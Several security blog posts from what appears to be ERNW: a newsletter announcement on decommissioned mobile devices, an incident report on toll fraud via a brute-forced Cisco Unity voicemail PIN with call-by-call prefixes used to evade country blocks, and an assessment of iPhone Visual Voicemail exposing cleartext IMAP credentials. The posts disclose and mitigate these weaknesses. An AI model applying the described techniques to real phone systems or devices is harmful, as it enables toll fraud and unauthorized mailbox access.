On Friday we released our latest technical newsletter with the fancy title “Sell Your Own Device – A Field Study on Decommissioning of Mobile Devices”. It is the result of a field study on decommissioned mobile business devices bought on eBay and about how stored data may be extracted in different ways.

As always we love to share plenty of practical advise: At the end of the newsletter you will find the mitigating controls to securely handle mobile devices at the end of their life cycle process.

Find the newsletter here.
And a digitally signed version here.

Special thanks go to Sergej Schmidt for performing the field study.

Talking about our great team: Meet the whole ERNW crew at TROOPERS12, or even better: Dig deeper into mobile security together with Rene Graf during the mobile security workshop. There are a few slots left.

Enjoy the newsletter & hopefully see you soon in Heidelberg!
Florian

Continue reading
Breaking

Groundhog Day: Don’t Pay Money for Some Else’s Calls, Still

Hi everyone,
it’s me again with another story of a toll fraud incident at one of our customers (not the same as the last time of course ;-)).
The story began basically like the last one: We received a call with an urgent request to help investigating a toll fraud issue. Like the last time I visited the site in order to get an idea on what was going on exactly. The customer has a VoIP deployment consisting of the whole UC Suite Cisco offers: Call Manager, Unity Connection for the voice mailboxes, Cisco based Voice-Gateways and of course, IP phones.

During the initial meeting I was told that the incident had taken place over the weekend, and had caused a bill of almost 100.000€ during this time period. Similar to the other incident, described two weeks ago , our customer didn’t discover it by himself but again the Telco contacted him beacause of that high bill. After the meeting I got ready to work my way through a whole bunch of log- and configuration files to analyze the situation. Spending 1 Âœ days on the customer site to analyze the issue, I was able to reconstruct the incident. As stated earlier, the customer uses Cisco Unity Connection as voice mail application. Unity is reachable over a specific telephone number so that employees are able to listen to voice mail messages if they are on the road . When dialing this specific number, one has to enter the internal extension followed by a PIN for authentication. It turned out, that someone had brute forced one of the mailboxes PIN.

So how could this toll fraud issue happen by just bruteforcing the PIN of a mailbox? After successful authentication though the PIN, one is also able to configure a transfer of a call to a telephone number of your choice. Now it should become clear, where this is going

After the bad guys retrieved the valid PIN, they configured a call transfer to some $EXPENSIVE_LONG_DISTANCE_CALL. In addition they changed the PIN in order to access the system whenever needed. As the issue started on a Friday evening (when almost everybody had already left for the weekend) nobody noticed the compromise of the mailbox. The bad guys logged in about 200 times during the weekend and configured different numbers to which the calls should be transferred. They started with some numbers located in African countries, which wasn’t successful because the configuration of the Call Manager blocked outgoing calls to such suspicious countries.

So, how could they initiate the calls nevertheless? These guys were smart. After realizing that the first approach wasn’t working they found a clever way to circumvent the restriction. They just used a so called “Call-by-Call” Provider. To use such a provider you have to prepend a provider specific prefix to the number. E.g. one prefix of a German provider is 010049. So they dialed 010049+$EXPENSIVE_LONG_DISTANCE_NUMBER and were able to circumvent the restriction on the Cisco Call Manager.

The first question which came to my mind was: Why can Cisco Unity initiate outbound calls? Well, according to our customer, there were some requirements that Unity should contact some home workers on their normal phone that new messages are present. In order to stop the potential exploit on short notice, we first configured the Call Manager denying Unity to initiate outbound calls. After digging into the configuration of Unity Connection and the Call Manager I found some configuration on the Unity connection box which enabled the attacker an easy game.

  1. The PIN was only 4 digits long.
  2. Unity Connection did not prevent the use of trivial PINs like „0000“ or „1234“.
  3. There was no restriction on to which number a call transfer could be configured.
  4. The ability to configure a call transfer over the Phone Interface is at least debatable.

These properties are a little unfortunate as Unity connection gives you all the tools you need to address the issues mentioned above. However, in this scenario the config had not been handled appropriately. So this case could basically be broken down to configuration weaknesses which favored the attacker to exploit the issue. Like in the last incident , the initial deployment and configuration was done by an external Service Provider.

So how can we assure that this won’t happen again?

  1. Use longer PINs. I recommended that the PIN should be at least 6 digits, which increases the number range you would have to bruteforce significantly, causing the attacker requiring up to 100 times as long for the attack! The password policy for the mailbox is configured in a so called authentication rule, where one can define all sort of things as for the mailbox password. In this authentication rule it was just one click to disable the use of trivial PINs.
  2. In Unity Connection, one can configure so called restriction tables to define to which numbers a call can be transferred. In the default installation there are some predefined restrictions, which didn’t work with the number plan of this particular customer.
  3. I recommended evaluating the need for configuration of call transfers over the phone, along with the advice to disable this functionality if not necessary.

All in all it is not rocket science to configure Unity Connection in a secure way, which unfortunately doesn’t mean you won’t find all kinds of scary misconfigurations. All the years at ERNW showed me this impressively.

As already said : It can cost you quite a lot of money if you do not take precautions to prevent that kind of incidents in the first place. So if you own the mentioned products (or plan on integrating them in your environment) check the configuration to ensure something like this won’t happen to you 😉

And one more thing: If you are interested in more VoIP security coverage don’t miss out Troopers 2012 where Enno and Daniel will give a talk on how to compromise the Cisco VoIP Crypto Ecosystem.

Have a great day,
Chris

 

Continue reading
Breaking

Assesment of Visual Voicemail on iPhones

VVM on iOS 5.0.1

Visual Voicemail (VVM) is a common feature of phone providers which allows accessing the good old voice-mailbox through the phone’s visual interface. In contrast to the classical voicemail approach, VVM allows intuitive navigation through voice-messages without dealing with an automated voice which tells you about message count and possible options. However, this implies the need of actually loading the messages of missed calls on the phone. The VVM-app displays missed calls and downloads corresponding messages which have been left by the initial caller. The software comes with your iPhone and is not intended for uninstallation. However, providers have to support it and will have to activate it for supporting clients. This feature is available on iPhones since August 2009 and became available on BlackBerrys and few Nokia phones later. Android doesn’t implement VVM in general. However some telecommunication providers offer their own apps to add this feature. Since version 4.0, Android offers an official Voicemail Provider API enabling better integration for the mobile OS.

Lately we had a deeper look at a VVM client. The client is integrated (on iPhones) into the phone app but has to be activated by the provider (and a special backend is needed). We assume it’s handled through a stealth SMS or alike, since related network traffic is not visible. Also most providers charge you for this feature. Some contracts include VVM, but typically it has to be activated initially. Even if connection to a wireless LAN exists, the traffic between phone and the VVM backend is routed through the 3G interface and doesn’t pass the Wi-Fi connection. This is interesting, since actually the Wi-Fi connection is typically preferred. This allows the providers to limit the backend access to their own „IPs used on the 3G networks“, meaning only customers with a SIM card from the corresponding provider can access the mailbox system. From a corporate point of view this also means, that a phone connected to a wireless LAN with an active VPN connection would certainly bypass its „default way to the Internet“ and consequently also bypass potentially present security controls like proxy servers.

After actual VVM usage, we jailbroke the phone and installed assessment tools. In addition we installed Cydia (third party app store), an SSH daemon (to connect remotely) and tcpdump (to sniff network traffic). Cydia makes use of the packet management as known from “Debian GNU/Linux”. So we used  “dpkg -i”  to install the local packet (.deb) of KeychainViewer, which was not available through the repository.

By sniffing the network traffic it was possible to examine the IMAP protocol revealing username and the corresponding hashed password (which allows to repeat a successful login) and of course all voicemail files. We want to highlight, that all the voicemail files have been transferred unencrypted. In addition we had a look at the keychain entries of the app. This revealed information (used protocol, port and server IP) already known from sniffing the network traffic and some new details. The first thing we recognized was the format of the account name (as already seen in network traffic) as well as the password, which is stored in cleartext. Knowing the server IP address, we already reach the critical amount of sensitive information becoming available through sniffing the network traffic. As the IMAP protocol on port 143 is used for communication, we were able to test the retrieved connection data and credentials by using a standard email client. Unsurprisingly it worked out well. The screenshots show how we used thunderbird to read the folder structure of the mailbox itself. Voice calls are basically implemented as emails with an .amr audio file attached.

Mailbox with Thunderbird

In addition we found, that after activation of the VVM feature, the configuration (.plist) file is stored at /var/mobile/Library/Voicemail/com.apple.voicemail.imap.parameters.plist
containing the username, protocol information, the state of the voicemail account and the server IP. Having the username and server IP, which depends on the provider but can typically be figured out very easily, an attacker can run brute force attacks against the email server which is exposed to the Internet.
Furthermore the whole data transfer turned out to be unencrypted. One could argue that sniffing 2G/3G isn’t that easy when compared with sniffing Wi-Fi traffic. But even though eavesdropping or MITM attacks are not as likely as on Wi-Fi networks, they shouldn’t be completely ignored. Unfortunately login credentials tend to be long-living data. Once intercepted, these data will give an attacker the opportunity to access mailboxes and corresponding applications for a long time.

Providers still seem to rely on the non-interceptable properties of their networks. Even though intercepting isn’t easy, several publications have proofed them wrong in the last years. Thus this thread model is at least questionable.In addition scenarios exist, in which traffic is routed through untrusted areas e.g. in case of roaming. Considering the increasing importance of TCP/IP, traffic will more and more pass untrusted areas. In addition the trust model seems not to imply the actual user as a threat against sensitive data stored on the device (such as credentials for the VVM server). Last but not least, finding sensitive information such as login credentials unencrypted/unhashed still comes with a sobering taste.
All this has to be kept in mind, when using such technologies and may lead to the question, if the providers trust/thread model matches your own or those of your environment/company.

Have a nice day,
Sergej

Continue reading